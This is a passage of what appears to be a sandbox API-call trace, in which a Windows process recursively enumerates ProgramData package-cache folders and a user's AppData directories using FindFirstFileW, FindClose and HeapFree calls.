out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.230] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.230] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.230] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.230] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.231] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.231] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.231] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.232] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.232] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.232] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.232] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.233] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.233] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.233] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.233] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.234] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.234] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.234] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.235] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.235] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.235] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.236] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.236] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.236] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.237] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.237] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.238] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.238] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.238] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.238] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.239] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.239] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.240] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.240] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.240] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.240] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.241] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.241] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.242] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.242] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.242] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.243] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.243] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.244] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.244] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c160 [0121.248] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0121.249] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0121.249] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0121.249] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0121.249] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.250] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.250] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0121.251] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c2a0 [0121.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c2e0 [0121.427] FindClose (in: hFindFile=0x29c2e0 | out: hFindFile=0x29c2e0) returned 1 [0121.427] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0121.427] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0121.427] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0121.427] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0121.428] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0121.429] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.343] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.343] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0122.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c260 [0122.389] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c1e0 [0122.389] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0122.390] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0122.390] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0122.390] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0122.391] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.391] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0122.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c260 [0122.393] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c1e0 [0122.393] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0122.395] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0122.395] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0122.395] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0122.412] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.412] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0122.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.413] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.413] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0122.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.414] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.414] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0122.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.415] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.415] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0122.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c260 [0122.416] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c1e0 [0122.417] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0122.417] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0122.417] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0122.418] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0122.419] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.419] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0122.419] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0122.419] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0122.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0xffffffff [0122.419] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0122.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c220 [0122.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Sun\\Java\\Java Update\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c260 [0122.422] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0122.422] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30ebf38 | out: hHeap=0x1db0000) returned 1 [0122.422] FindClose (in: hFindFile=0x29c160 | out: hFindFile=0x29c160) returned 1 [0122.422] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0122.422] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0122.423] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0122.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0xffffffff [0122.423] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x308bf08 | out: hHeap=0x1db0000) returned 1 [0122.423] FindClose (in: hFindFile=0x29c0a0 | out: hFindFile=0x29c0a0) returned 1 [0122.423] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0122.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0xffffffff [0122.426] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0122.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0xffffffff [0122.426] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0122.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x3a0f954 | out: lpFindFileData=0x3a0f954) returned 0x29c0a0 [0122.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 0x29c220 [0122.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c160 [0122.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c260 [0122.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c1e0 [0122.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c2a0 [0122.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c3e0 [0122.538] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x3a0e7b8 | out: lpFindFileData=0x3a0e7b8) returned 0x29c420 [0122.538] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0122.538] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40800c0 | out: hHeap=0x1db0000) returned 1 [0122.556] FindClose (in: hFindFile=0x29c3e0 | out: hFindFile=0x29c3e0) returned 1 [0122.556] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0122.557] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0122.557] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0122.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c2a0 [0122.557] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\Profiles\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c3e0 [0122.557] FindClose (in: hFindFile=0x29c3e0 | out: hFindFile=0x29c3e0) returned 1 [0122.557] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0122.558] FindClose (in: hFindFile=0x29c2a0 | out: hFindFile=0x29c2a0) returned 1 [0122.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4010088 | out: hHeap=0x1db0000) returned 1 [0122.558] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0122.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0122.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0xffffffff [0122.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4000080 | out: hHeap=0x1db0000) returned 1 [0122.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c1e0 [0122.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c2a0 [0122.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c3e0 [0122.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x3a0e7b8 | out: lpFindFileData=0x3a0e7b8) returned 0x29c420 [0122.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x3a0e534 | out: lpFindFileData=0x3a0e534) returned 0x29c460 [0122.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x3a0e2b0 | out: lpFindFileData=0x3a0e2b0) returned 0x29c4a0 [0122.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x3a0e02c | out: lpFindFileData=0x3a0e02c) returned 0x29c4e0 [0122.559] FindClose (in: hFindFile=0x29c4e0 | out: hFindFile=0x29c4e0) returned 1 [0122.559] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40b00d8 | out: hHeap=0x1db0000) returned 1 [0122.560] FindClose (in: hFindFile=0x29c4a0 | out: hFindFile=0x29c4a0) returned 1 [0122.560] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40a00d0 | out: hHeap=0x1db0000) returned 1 [0122.560] FindClose (in: hFindFile=0x29c460 | out: hFindFile=0x29c460) returned 1 [0122.562] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40900c8 | out: hHeap=0x1db0000) returned 1 [0122.562] FindClose (in: hFindFile=0x29c420 | out: hFindFile=0x29c420) returned 1 [0122.562] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x40800c0 | out: hHeap=0x1db0000) returned 1 [0122.562] FindClose (in: hFindFile=0x29c3e0 | out: hFindFile=0x29c3e0) returned 1 [0122.563] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x4020090 | out: hHeap=0x1db0000) returned 1 [0122.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*", lpFindFileData=0x3a0ea3c | out: lpFindFileData=0x3a0ea3c) returned 0x29c3e0 [0122.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\*", lpFindFileData=0x3a0e7b8 | out: lpFindFileData=0x3a0e7b8) returned 0x29c420 